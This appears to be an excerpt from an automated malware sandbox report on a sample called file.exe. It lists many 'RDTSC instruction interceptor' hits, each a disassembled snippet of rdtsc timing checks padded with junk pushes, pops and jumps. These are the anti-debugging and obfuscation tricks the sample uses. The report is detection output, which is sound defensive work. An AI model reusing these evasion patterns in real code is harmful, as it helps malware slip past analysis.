                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8DFF second address: 10D8E03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8E03 second address: 10D8E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FB0D54BC078h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8E27 second address: 10D8E37 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8E37 second address: 10D8E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D8E3C second address: 10D8E41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E4B08 second address: 10E4B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3D40 second address: 10E3D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3D48 second address: 10E3D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3D4C second address: 10E3D54 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3D54 second address: 10E3D69 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jc 00007FB0D54BC066h 0x00000009 pop edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007FB0D54BC066h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3D69 second address: 10E3D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3D74 second address: 10E3D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E464A second address: 10E4699 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB0D4776373h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB0D4776375h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007FB0D4776376h 0x00000018 je 00007FB0D477636Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E47E2 second address: 10E47EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB6F6 second address: 10EB706 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007FB0D4776366h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBECA second address: 10EBED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBED0 second address: 10EBEE1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB0D4776366h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC157 second address: 10EC15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC15B second address: 10EC176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB0D4776370h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC176 second address: 10EC17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC17C second address: 10EC198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 ja 00007FB0D4776366h 0x0000000e pop esi 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 pushad 0x00000014 jc 00007FB0D4776366h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC2A8 second address: 10EC2AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC2AD second address: 10EC2CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4776371h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e jp 00007FB0D4776366h 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC2CE second address: 10EC2D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ECCA3 second address: 10ECCB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007FB0D4776368h 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ECCB3 second address: 10ECCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ECCB9 second address: 10ECCC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ECCC1 second address: 10ECCE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB0D4D733D4h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ECCE2 second address: 10ECD04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FB0D4C188D8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ECD04 second address: 10ECD09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ECD09 second address: 10ECD13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FB0D4C188C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ED445 second address: 10ED469 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB0D4D733C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB0D4D733D6h 0x0000000f pushad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ED469 second address: 10ED484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FB0D4C188D2h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F5518 second address: 10F551C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F551C second address: 10F5520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F5520 second address: 10F553E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FB0D4D733CEh 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jnc 00007FB0D4D733C6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F500F second address: 10F5014 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F515C second address: 10F5160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F5160 second address: 10F5166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F5166 second address: 10F516C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F89DC second address: 10F89E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F89E0 second address: 10F89E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F89E6 second address: 10F89EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F89EB second address: 10F89F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11029E7 second address: 11029EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110260C second address: 1102627 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FB0D4D733CEh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1102627 second address: 110262B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110262B second address: 1102631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1106FDE second address: 1107009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FB0D4C188CDh 0x0000000b jp 00007FB0D4C188C6h 0x00000011 popad 0x00000012 jl 00007FB0D4C188E6h 0x00000018 pushad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jns 00007FB0D4C188C6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1107009 second address: 1107018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jo 00007FB0D4D733C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1106A5A second address: 1106A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1106A60 second address: 1106A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB0D4D733CDh 0x0000000a jmp 00007FB0D4D733CCh 0x0000000f pushad 0x00000010 jmp 00007FB0D4D733CDh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1106C03 second address: 1106C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1106C07 second address: 1106C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1106C0B second address: 1106C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10303F3 second address: 10303F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10303F9 second address: 10303FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1117C0E second address: 1117C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1117C14 second address: 1117C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111F27E second address: 111F28E instructions: 0x00000000 rdtsc 0x00000002 je 00007FB0D4D733C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111F417 second address: 111F41D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111F83D second address: 111F84E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0D4D733CDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111F84E second address: 111F857 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111F993 second address: 111F99A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111F99A second address: 111F9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0D4C188D5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jmp 00007FB0D4C188D1h 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 111FB4A second address: 111FB4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1124C9C second address: 1124CAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4C188CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11266E9 second address: 11266F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11266F7 second address: 11266FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 101BCB9 second address: 101BCCB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FB0D4D733C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11432D5 second address: 11432DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11432DD second address: 11432E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1143186 second address: 1143195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jnc 00007FB0D4C188C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1144914 second address: 114491E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB0D4D733C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1146CF4 second address: 1146D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB0D4C188C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FB0D4C188E0h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 114686C second address: 1146870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1146870 second address: 114687E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4C188CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 114687E second address: 1146896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0D4D733D4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1146896 second address: 114689A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 114689A second address: 11468B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0D4D733D3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1157164 second address: 11571C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 jp 00007FB0D4C188C6h 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jno 00007FB0D4C188C6h 0x00000018 jmp 00007FB0D4C188D8h 0x0000001d jne 00007FB0D4C188C6h 0x00000023 popad 0x00000024 jnc 00007FB0D4C188D8h 0x0000002a pushad 0x0000002b popad 0x0000002c jmp 00007FB0D4C188D0h 0x00000031 push esi 0x00000032 jo 00007FB0D4C188C6h 0x00000038 pushad 0x00000039 popad 0x0000003a pop esi 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f push edi 0x00000040 pop edi 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11575C0 second address: 11575DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4D733D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FB0D4D733C6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11575DC second address: 11575F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e jnc 00007FB0D4C188C6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11575F0 second address: 1157614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0D4D733CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB0D4D733D4h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1157AAF second address: 1157AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1157AB4 second address: 1157AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1157C09 second address: 1157C11 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1157C11 second address: 1157C17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 115C110 second address: 115C190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jbe 00007FB0D4C188C8h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FB0D4C188C8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov edx, dword ptr [ebp+122D2934h] 0x00000033 push 00000004h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007FB0D4C188C8h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f xor dx, 2D87h 0x00000054 or edx, dword ptr [ebp+122D2B0Eh] 0x0000005a push 1F29F8F8h 0x0000005f pushad 0x00000060 jl 00007FB0D4C188C8h 0x00000066 push edx 0x00000067 pop edx 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 115C190 second address: 115C194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 115C422 second address: 115C427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 115C427 second address: 115C47D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB0D4D733CCh 0x00000008 jbe 00007FB0D4D733C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 clc 0x00000014 movzx edx, di 0x00000017 push dword ptr [ebp+122D1BB4h] 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007FB0D4D733C8h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 mov dh, al 0x00000039 call 00007FB0D4D733C9h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 jc 00007FB0D4D733C6h 0x00000047 pop eax 0x00000048 rdtsc
